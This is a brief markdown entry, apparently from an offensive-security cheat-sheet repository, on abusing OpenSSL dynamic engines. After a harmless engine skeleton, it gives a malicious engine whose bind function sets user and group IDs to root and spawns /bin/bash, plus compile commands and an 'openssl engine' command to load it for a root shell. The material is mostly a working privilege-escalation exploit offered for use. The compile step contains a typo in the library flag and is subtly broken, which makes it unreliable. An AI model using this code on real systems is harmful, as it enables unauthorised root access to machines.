killchain-compendium/misc/openssl/openssl_engine.md

743 B

OpenSSL Engine

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
  return 1;
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
  • Shell as root
#include <openssl/engine.h>
#include <unistd.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
  • Compile
gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
  • Execute via
openssl engine -t `pwd`/rootshell.so